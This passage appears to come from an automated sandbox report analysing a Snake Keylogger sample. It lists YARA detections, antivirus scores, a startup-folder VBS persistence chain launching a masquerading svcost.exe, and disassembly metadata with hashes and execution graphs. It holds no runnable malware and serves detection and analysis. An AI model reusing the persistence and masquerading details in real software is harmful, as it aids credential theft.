                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 68%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:09:07:40
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
                                                                                          Imagebase:0xffdb0000
                                                                                          File size:168'960 bytes
                                                                                          MD5 hash:045451FA238A75305CC26AC982472367
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:09:07:43
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\svcost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\svcost.exe"
                                                                                          Imagebase:0xa70000
                                                                                          File size:293'066'043 bytes
                                                                                          MD5 hash:A210D6F3E1093395552CE55FA063E011
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Executed Functions

                                                                                            Function 000007FE8B9302A4 Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.426482209.000007FE8B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B930000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7fe8b930000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6z
                                                                                            • API String ID: 0-1317627328
                                                                                            • Opcode ID: d1cbd7525a040c63371d592d9fe6cc16394903102316c700a6180b55e197e772
                                                                                            • Instruction ID: ec55e0ab15ada818ec528fba69648583369611f9347240557781261e218f37d1
                                                                                            • Opcode Fuzzy Hash: d1cbd7525a040c63371d592d9fe6cc16394903102316c700a6180b55e197e772
                                                                                            • Instruction Fuzzy Hash: 8CC1F02060DAC94FEB56A77C58147A5BFE2EF8A254F1810EBD08DCB1B3DA189C56C352
                                                                                            Function 000007FE8B930A9B Relevance: .1, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.426482209.000007FE8B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B930000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7fe8b930000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a7fcc544ffbd4f77cccc36db041aca9817b6c934b7b4f9cadbde850160839974
                                                                                            • Instruction ID: 0fc5bbe5172a6181964d2513e11126451568b117e31d9ef94382e93ffdc88189
                                                                                            • Opcode Fuzzy Hash: a7fcc544ffbd4f77cccc36db041aca9817b6c934b7b4f9cadbde850160839974
                                                                                            • Instruction Fuzzy Hash: 0A41CE3051DACA4FDB96A77C44187B0BBE2EF5A259F2910EAC08DCB1B3DA28DC55C351
                                                                                            Function 000007FE8B9302BA Relevance: .1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.426482209.000007FE8B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B930000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7fe8b930000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47e79105694737059086c1ac5f5d76f70e0a8ab366bf55cf52b5771adb18b6a1
                                                                                            • Instruction ID: 8f2c804a79152a2eff08d52a4732d40094bee957c7ef99322211e3727ab62221
                                                                                            • Opcode Fuzzy Hash: 47e79105694737059086c1ac5f5d76f70e0a8ab366bf55cf52b5771adb18b6a1
                                                                                            • Instruction Fuzzy Hash: 6C31E63091C99E4FEBA5E77C8048775B7E2EB59359F2820EAC08DC71B2D624DC51C750
                                                                                            Function 000007FE8B9302CC Relevance: .1, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.426482209.000007FE8B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE8B930000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7fe8b930000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73f58b5d90ab1c1e2aed2eb131cd767c8d45a205e8f9a383bc8956ef12e9975c
                                                                                            • Instruction ID: 81c3ed851d9a9becb8427fc774b72bc8179c35235ffb96b29255cfdb45f40e12
                                                                                            • Opcode Fuzzy Hash: 73f58b5d90ab1c1e2aed2eb131cd767c8d45a205e8f9a383bc8956ef12e9975c
                                                                                            • Instruction Fuzzy Hash: F531B43091899E4FEBA5E77C8058775B7E2FB98399F6420AAC04DC71B2DA29DC51C740

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.1%
                                                                                            Dynamic/Decrypted Code Coverage:69.4%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:62
                                                                                            Total number of Limit Nodes:3
                                                                                            execution_graph 50589 1bd048 50590 1bd060 50589->50590 50591 1bd0bb 50590->50591 50593 4a7e428 50590->50593 50594 4a7e481 50593->50594 50597 4a7e9b8 50594->50597 50595 4a7e4b6 50598 4a7e9e5 50597->50598 50601 4a7eb7b 50598->50601 50602 4a7d840 50598->50602 50601->50595 50604 4a7d867 50602->50604 50606 4a7dd40 50604->50606 50607 4a7dd89 VirtualProtect 50606->50607 50609 4a7d924 50607->50609 50609->50595 50610 2088c8 50611 2088e5 50610->50611 50616 2088f5 50611->50616 50617 4a7a647 50611->50617 50620 4a77a1d 50611->50620 50624 4a7244d 50611->50624 50627 4a74cd6 50611->50627 50619 4a7d840 VirtualProtect 50617->50619 50618 4a701de 50619->50618 50621 4a77a3c 50620->50621 50623 4a7d840 VirtualProtect 50621->50623 50622 4a701de 50623->50622 50626 4a7d840 VirtualProtect 50624->50626 50625 4a701de 50626->50625 50628 4a74cf5 50627->50628 50630 4a7d840 VirtualProtect 50628->50630 50629 4a74d1a 50630->50629 50631 614288 50632 61429b LdrInitializeThunk 50631->50632 50555 d2679e 50556 d264a2 50555->50556 50559 aabf08 50556->50559 50564 aabf18 50556->50564 50560 aabf18 50559->50560 50569 aabf58 50560->50569 50573 aabf49 50560->50573 50561 aabf43 50561->50556 50565 aabf2d 50564->50565 50567 aabf58 SleepEx 50565->50567 50568 aabf49 SleepEx 50565->50568 50566 aabf43 50566->50556 50567->50566 50568->50566 50571 aabf82 50569->50571 50570 aac0ef 50570->50561 50571->50570 50577 aaf847 50571->50577 50574 aabf58 50573->50574 50575 aac0ef 50574->50575 50576 aaf847 SleepEx 50574->50576 50575->50561 50576->50574 50578 aaf86d 50577->50578 50581 aaf710 50578->50581 50582 aaf754 SleepEx 50581->50582 50584 aaf7b4 50582->50584 50584->50571 50585 d266dd 50586 d264a2 50585->50586 50587 aabf08 SleepEx 50586->50587 50588 aabf18 SleepEx 50586->50588 50587->50586 50588->50586 50638 4a7ef08 50639 4a7ef4c VirtualAlloc 50638->50639 50641 4a7efb9 50639->50641

                                                                                            Executed Functions

                                                                                            Function 0064F0E8 Relevance: 18.1, Strings: 14, Instructions: 618COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 64f0e8-64f109 1 64f110-64f1a0 call 64fc50 0->1 2 64f10b 0->2 7 64f1a6-64f1f3 1->7 2->1 10 64f1f5-64f200 7->10 11 64f202 7->11 12 64f20c-64f327 10->12 11->12 23 64f339-64f364 12->23 24 64f329-64f32f 12->24 25 64fb30-64fb4c 23->25 24->23 26 64fb52-64fb6d 25->26 27 64f369-64f4cc call 64df00 25->27 38 64f4de-64f673 call 64b680 call 648ab0 27->38 39 64f4ce-64f4d4 27->39 51 64f675-64f679 38->51 52 64f6d8-64f6e2 38->52 39->38 53 64f681-64f6d3 51->53 54 64f67b-64f67c 51->54 55 64f909-64f928 52->55 56 64f9ae-64fa19 53->56 54->56 57 64f6e7-64f82d call 64df00 55->57 58 64f92e-64f958 55->58 75 64fa2b-64fa76 56->75 76 64fa1b-64fa21 56->76 87 64f902-64f903 57->87 88 64f833-64f8ff call 64df00 57->88 64 64f95a-64f9a8 58->64 65 64f9ab-64f9ac 58->65 64->65 65->56 78 64fb15-64fb2d 75->78 79 64fa7c-64fb14 75->79 76->75 78->25 79->78 87->55 88->87
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: f"p$8$l,$l,$l,$l,$l,$x,$x,$x,$,$,$,$,
                                                                                            • API String ID: 0-649124668
                                                                                            • Opcode ID: f974f66a4e26cad1e2fe3a7e49b069126f5037a7ab48f3832ab2e5ec28284e97
                                                                                            • Instruction ID: a4007f8bc8ee9d7c67aa54796cda372c50ffca566060a164173e02f6478432d5
                                                                                            • Opcode Fuzzy Hash: f974f66a4e26cad1e2fe3a7e49b069126f5037a7ab48f3832ab2e5ec28284e97
                                                                                            • Instruction Fuzzy Hash: B552D575E006288FDB64DF69C890AD9B7B2FF99300F1086EAD509A7355DB70AE81CF50
                                                                                            Function 00A90040 Relevance: 6.3, Strings: 4, Instructions: 1335COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 453 a90040-a9006e 454 a90070 453->454 455 a90075-a90197 453->455 454->455 459 a90199-a901b5 call a92bc0 455->459 460 a901bb-a901c7 455->460 459->460 461 a901c9 460->461 462 a901ce-a901d3 460->462 461->462 464 a9020b-a90254 462->464 465 a901d5-a901e1 462->465 474 a9025b-a90520 464->474 475 a90256 464->475 466 a901e8-a90206 465->466 467 a901e3 465->467 469 a9196f-a91975 466->469 467->466 470 a919a0 469->470 471 a91977-a91997 469->471 473 a919a1 470->473 471->470 473->473 501 a90f50-a90f5c 474->501 475->474 502 a90f62-a90f9a 501->502 503 a90525-a90531 501->503 512 a91074-a9107a 502->512 504 a90538-a9065d 503->504 505 a90533 503->505 539 a9069d-a90726 504->539 540 a9065f-a90697 504->540 505->504 513 a90f9f-a9101c 512->513 514 a91080-a910b8 512->514 529 a9104f-a91071 513->529 530 a9101e-a91022 513->530 524 a91416-a9141c 514->524 526 a910bd-a912bf 524->526 527 a91422-a9146a 524->527 621 a9135e-a91362 526->621 622 a912c5-a91359 526->622 536 a9146c-a914df 527->536 537 a914e5-a91530 527->537 529->512 530->529 534 a91024-a9104c 530->534 534->529 536->537 559 a91939-a9193f 537->559 566 a90728-a90730 539->566 567 a90735-a907b9 539->567 540->539 561 a91535-a915b7 559->561 562 a91945-a9196d 559->562 580 a915b9-a915d4 561->580 581 a915df-a915eb 561->581 562->469 570 a90f41-a90f4d 566->570 597 a907c8-a9084c 567->597 598 a907bb-a907c3 567->598 570->501 580->581 583 a915ed 581->583 584 a915f2-a915fe 581->584 583->584 588 a91611-a91620 584->588 589 a91600-a9160c 584->589 592 a91629-a91901 588->592 593 a91622 588->593 591 a91920-a91936 589->591 591->559 624 a9190c-a91918 592->624 593->592 599 a91788-a917f1 593->599 600 a9171a-a91783 593->600 601 a9169d-a91715 593->601 602 a9162f-a91698 593->602 603 a917f6-a9185e 593->603 644 a9085b-a908df 597->644 645 a9084e-a90856 597->645 598->570 599->624 600->624 601->624 602->624 632 a918d2-a918d8 603->632 627 a913bf-a913fc 621->627 628 a91364-a913bd 621->628 646 a913fd-a91413 622->646 624->591 627->646 628->646 637 a918da-a918e4 632->637 638 a91860-a918be 632->638 637->624 651 a918c0 638->651 652 a918c5-a918cf 638->652 659 a908ee-a90972 644->659 660 a908e1-a908e9 644->660 645->570 646->524 651->652 652->632 666 a90981-a90a05 659->666 667 a90974-a9097c 659->667 660->570 673 a90a14-a90a98 666->673 674 a90a07-a90a0f 666->674 667->570 680 a90a9a-a90aa2 673->680 681 a90aa7-a90b2b 673->681 674->570 680->570 687 a90b3a-a90bbe 681->687 688 a90b2d-a90b35 681->688 694 a90bcd-a90c51 687->694 695 a90bc0-a90bc8 687->695 688->570 701 a90c60-a90ce4 694->701 702 a90c53-a90c5b 694->702 695->570 708 a90cf3-a90d77 701->708 709 a90ce6-a90cee 701->709 702->570 715 a90d79-a90d81 708->715 716 a90d86-a90e0a 708->716 709->570 715->570 722 a90e19-a90e9d 716->722 723 a90e0c-a90e14 716->723 729 a90eac-a90f30 722->729 730 a90e9f-a90ea7 722->730 723->570 736 a90f3c-a90f3e 729->736 737 a90f32-a90f3a 729->737 730->570 736->570 737->570
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0l,$2$H<,$Lk,
                                                                                            • API String ID: 0-1894915305
                                                                                            • Opcode ID: bd5902a5e5de6e1ad4b090bb60f2c236470334522380783ef92e6bde670bdf89
                                                                                            • Instruction ID: 28b718c219218106c6addb044d19c9d245896bdf22c2256fec8e29784a4360bf
                                                                                            • Opcode Fuzzy Hash: bd5902a5e5de6e1ad4b090bb60f2c236470334522380783ef92e6bde670bdf89
                                                                                            • Instruction Fuzzy Hash: 0EE2D574A046288FCB65EF68D894B9DB7F2FB89301F1081E9E809A7395DB745E85CF40
                                                                                            Function 00D2C6A9 Relevance: 6.0, Strings: 4, Instructions: 1036COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kh$fh
                                                                                            • API String ID: 0-890375897
                                                                                            • Opcode ID: 0813807d1e34dec2a774269fa3b6ced89ca2e910214e588142d0e9dabcc34050
                                                                                            • Instruction ID: a1888ef2ea8bf91d39afe3f47a82c1350302dd715fac1d1bbb66abc2528288ac
                                                                                            • Opcode Fuzzy Hash: 0813807d1e34dec2a774269fa3b6ced89ca2e910214e588142d0e9dabcc34050
                                                                                            • Instruction Fuzzy Hash: 69A21634A102289FDB14DFA4D894BADB7B2FF98304F1491A9E505AB3A5DB70EC41CF60
                                                                                            Function 0020CAD8 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1040 20cad8-20caf9 1041 20cb00-20cbe7 1040->1041 1042 20cafb 1040->1042 1044 20d2e9-20d311 1041->1044 1045 20cbed-20cd2e call 209028 1041->1045 1042->1041 1048 20da17-20da20 1044->1048 1091 20d2b2-20d2dc 1045->1091 1092 20cd34-20cd8f 1045->1092 1050 20da26-20da3d 1048->1050 1051 20d31f-20d329 1048->1051 1052 20d330-20d424 call 209028 1051->1052 1053 20d32b 1051->1053 1074 20d426-20d432 1052->1074 1075 20d44e 1052->1075 1053->1052 1077 20d434-20d43a 1074->1077 1078 20d43c-20d442 1074->1078 1076 20d454-20d474 1075->1076 1082 20d4d4-20d554 1076->1082 1083 20d476-20d4cf 1076->1083 1080 20d44c 1077->1080 1078->1080 1080->1076 1103 20d556-20d5a9 1082->1103 1104 20d5ab-20d5ee call 209028 1082->1104 1095 20da14 1083->1095 1105 20d2e6 1091->1105 1106 20d2de 1091->1106 1098 20cd91 1092->1098 1099 20cd94-20cd9f 1092->1099 1095->1048 1098->1099 1102 20d1c7-20d1cd 1099->1102 1107 20d1d3-20d24f call 2084f0 1102->1107 1108 20cda4-20cdc2 1102->1108 1129 20d5f9-20d602 1103->1129 1104->1129 1105->1044 1106->1105 1148 20d29c-20d2a2 1107->1148 1110 20cdc4-20cdc8 1108->1110 1111 20ce19-20ce2e 1108->1111 1110->1111 1114 20cdca-20cdd5 1110->1114 1116 20ce30 1111->1116 1117 20ce35-20ce4b 1111->1117 1120 20ce0b-20ce11 1114->1120 1116->1117 1118 20ce52-20ce69 1117->1118 1119 20ce4d 1117->1119 1124 20ce70-20ce86 1118->1124 1125 20ce6b 1118->1125 1119->1118 1126 20ce13-20ce14 1120->1126 1127 20cdd7-20cddb 1120->1127 1132 20ce88 1124->1132 1133 20ce8d-20ce94 1124->1133 1125->1124 1135 20ce97-20cf02 1126->1135 1130 20cde1-20cdf9 1127->1130 1131 20cddd 1127->1131 1136 20d662-20d671 1129->1136 1137 20ce00-20ce08 1130->1137 1138 20cdfb 1130->1138 1131->1130 1132->1133 1133->1135 1139 20cf04-20cf10 1135->1139 1140 20cf16-20d0cb 1135->1140 1142 20d673-20d6fb 1136->1142 1143 20d604-20d62c 1136->1143 1137->1120 1138->1137 1139->1140 1150 20d0cd-20d0d1 1140->1150 1151 20d12f-20d144 1140->1151 1178 20d874-20d880 1142->1178 1145 20d633-20d65c 1143->1145 1146 20d62e 1143->1146 1145->1136 1146->1145 1154 20d251-20d299 1148->1154 1155 20d2a4-20d2aa 1148->1155 1150->1151 1152 20d0d3-20d0e2 1150->1152 1156 20d146 1151->1156 1157 20d14b-20d16c 1151->1157 1158 20d121-20d127 1152->1158 1154->1148 1155->1091 1156->1157 1159 20d173-20d192 1157->1159 1160 20d16e 1157->1160 1165 20d0e4-20d0e8 1158->1165 1166 20d129-20d12a 1158->1166 1162 20d194 1159->1162 1163 20d199-20d1b9 1159->1163 1160->1159 1162->1163 1171 20d1c0 1163->1171 1172 20d1bb 1163->1172 1169 20d0f2-20d113 1165->1169 1170 20d0ea-20d0ee 1165->1170 1173 20d1c4 1166->1173 1174 20d115 1169->1174 1175 20d11a-20d11e 1169->1175 1170->1169 1171->1173 1172->1171 1173->1102 1174->1175 1175->1158 1180 20d700-20d709 1178->1180 1181 20d886-20d8e1 1178->1181 1182 20d712-20d868 1180->1182 1183 20d70b 1180->1183 1196 20d8e3-20d916 1181->1196 1197 20d918-20d942 1181->1197 1201 20d86e 1182->1201 1183->1182 1185 20d7a2-20d7e2 1183->1185 1186 20d7e7-20d827 1183->1186 1187 20d718-20d758 1183->1187 1188 20d75d-20d79d 1183->1188 1185->1201 1186->1201 1187->1201 1188->1201 1205 20d94b-20d9de 1196->1205 1197->1205 1201->1178 1209 20d9e5-20da05 1205->1209 1209->1095
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0,$TJ"p$p!p$xb p
                                                                                            • API String ID: 0-2495302866
                                                                                            • Opcode ID: abd776b3ac7c82ec9c6c65e371418a85b56867552ac06b67b4c86b20234cdcdc
                                                                                            • Instruction ID: d5d251d852e54f3c3dcf15c666a849d4648451a8a8cea55b20f44153d43fbf6a
                                                                                            • Opcode Fuzzy Hash: abd776b3ac7c82ec9c6c65e371418a85b56867552ac06b67b4c86b20234cdcdc
                                                                                            • Instruction Fuzzy Hash: 60A2C675A00228CFDB64CF69C884B9DBBB2BF89304F1581E9D509AB362D7319E91CF40
                                                                                            Function 00D2C010 Relevance: 5.7, Strings: 4, Instructions: 685COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kh$fh
                                                                                            • API String ID: 0-890375897
                                                                                            • Opcode ID: 9759561703539979e6a275d7192a35c91bb820c16879bbfd309e0350ed9be81d
                                                                                            • Instruction ID: 3e0697f6be8921d5ce00124ead5cbdd5d1e0ed929eb0fbf1f47953bcdfe21c4d
                                                                                            • Opcode Fuzzy Hash: 9759561703539979e6a275d7192a35c91bb820c16879bbfd309e0350ed9be81d
                                                                                            • Instruction Fuzzy Hash: 9B620A34A10224CFDB24DF64D894BADB7B2BF98304F1491A5E509AB3A5DB71ED81CF60
                                                                                            Function 00D2C347 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kh$fh
                                                                                            • API String ID: 0-890375897
                                                                                            • Opcode ID: 5fd3e0b8378ee758866f89a70212039c9107041515051861b78084b271afddaf
                                                                                            • Instruction ID: d5ab6f64265813949a5598a1d282b7bd97e8868783606b4f629aeb3692015271
                                                                                            • Opcode Fuzzy Hash: 5fd3e0b8378ee758866f89a70212039c9107041515051861b78084b271afddaf
                                                                                            • Instruction Fuzzy Hash: 74220C34A10224CFDB24DF64D894BADB7B2BF98304F1491A5E509AB3A5DB71ED81CF60
                                                                                            Function 00AA7470 Relevance: 3.2, Strings: 2, Instructions: 679COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2078 aa7470-aa748c 2079 aa750e-aa7567 2078->2079 2080 aa7492-aa749f 2078->2080 2095 aa7628-aa7689 2079->2095 2096 aa756d-aa7573 2079->2096 2083 aa74a1-aa74af call aa6eb0 2080->2083 2084 aa74b6-aa74ba 2080->2084 2089 aa74b1-aa74b4 2083->2089 2086 aa74bc-aa74e0 2084->2086 2087 aa74e2 2084->2087 2086->2087 2088 aa74eb-aa74fa 2086->2088 2087->2088 2092 aa7502-aa750b 2088->2092 2089->2088 2115 aa768b-aa76b2 2095->2115 2116 aa76b3-aa7701 2095->2116 2097 aa759d-aa75ae 2096->2097 2098 aa7575-aa7578 2096->2098 2103 aa75b0 2097->2103 2104 aa75b6-aa75ba 2097->2104 2099 aa757a-aa759c 2098->2099 2100 aa75f3-aa7621 2098->2100 2100->2095 2107 aa75c2-aa75f2 2103->2107 2108 aa75b2-aa75b4 2103->2108 2104->2107 2108->2104 2108->2107 2121 aa7703-aa770c call aa7318 2116->2121 2122 aa7711-aa7715 2116->2122 2121->2122 2124 aa772b-aa773c 2122->2124 2125 aa7717-aa7726 2122->2125 2126 aa7c3a-aa7c68 2124->2126 2127 aa7742-aa7757 2124->2127 2128 aa7ac0-aa7ac7 2125->2128 2135 aa7c6a 2126->2135 2136 aa7c6f-aa7c86 2126->2136 2129 aa7759-aa775e 2127->2129 2130 aa7763-aa7776 2127->2130 2129->2128 2131 aa7ac8-aa7ae6 2130->2131 2132 aa777c-aa7788 2130->2132 2141 aa7aed-aa7b0b 2131->2141 2132->2126 2134 aa778e-aa77c5 2132->2134 2137 aa77d1-aa77d5 2134->2137 2138 aa77c7-aa77cc 2134->2138 2135->2136 2146 aa7c89-aa7c8f 2136->2146 2140 aa77db-aa77e7 2137->2140 2137->2141 2138->2128 2140->2126 2143 aa77ed-aa7824 2140->2143 2153 aa7b12-aa7b30 2141->2153 2148 aa7830-aa7834 2143->2148 2149 aa7826-aa782b 2143->2149 2150 aa7c98-aa7c99 2146->2150 2151 aa7c91 2146->2151 2152 aa783a-aa7846 2148->2152 2148->2153 2149->2128 2157 aa7ca0-aa7cc1 2150->2157 2151->2150 2155 aa7c9b-aa7c9f 2151->2155 2156 aa7ccd-aa7cec 2151->2156 2151->2157 2152->2126 2159 aa784c-aa7883 2152->2159 2167 aa7b37-aa7b55 2153->2167 2156->2146 2170 aa7cee-aa7cf4 2156->2170 2157->2146 2169 aa7cc3-aa7ccb 2157->2169 2161 aa788f-aa7893 2159->2161 2162 aa7885-aa788a 2159->2162 2166 aa7899-aa78a5 2161->2166 2161->2167 2162->2128 2166->2126 2168 aa78ab-aa78e2 2166->2168 2176 aa7b5c-aa7b7a 2167->2176 2172 aa78ee-aa78f2 2168->2172 2173 aa78e4-aa78e9 2168->2173 2169->2146 2170->2146 2175 aa78f8-aa7904 2172->2175 2172->2176 2173->2128 2175->2126 2179 aa790a-aa7941 2175->2179 2184 aa7b81-aa7b9f 2176->2184 2180 aa794d-aa7951 2179->2180 2181 aa7943-aa7948 2179->2181 2180->2184 2185 aa7957-aa7963 2180->2185 2181->2128 2191 aa7ba6-aa7bc4 2184->2191 2185->2126 2186 aa7969-aa79a0 2185->2186 2189 aa79ac-aa79b0 2186->2189 2190 aa79a2-aa79a7 2186->2190 2189->2191 2192 aa79b6-aa79c2 2189->2192 2190->2128 2200 aa7bcb-aa7be9 2191->2200 2192->2126 2195 aa79c8-aa79ff 2192->2195 2197 aa7a0b-aa7a0f 2195->2197 2198 aa7a01-aa7a06 2195->2198 2197->2200 2201 aa7a15-aa7a21 2197->2201 2198->2128 2207 aa7bf0-aa7c0e 2200->2207 2201->2126 2202 aa7a27-aa7a5e 2201->2202 2205 aa7a60-aa7a65 2202->2205 2206 aa7a67-aa7a6b 2202->2206 2205->2128 2206->2207 2208 aa7a71-aa7a7a 2206->2208 2213 aa7c15-aa7c33 2207->2213 2208->2126 2211 aa7a80-aa7ab5 2208->2211 2212 aa7abb 2211->2212 2211->2213 2212->2128 2213->2126
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
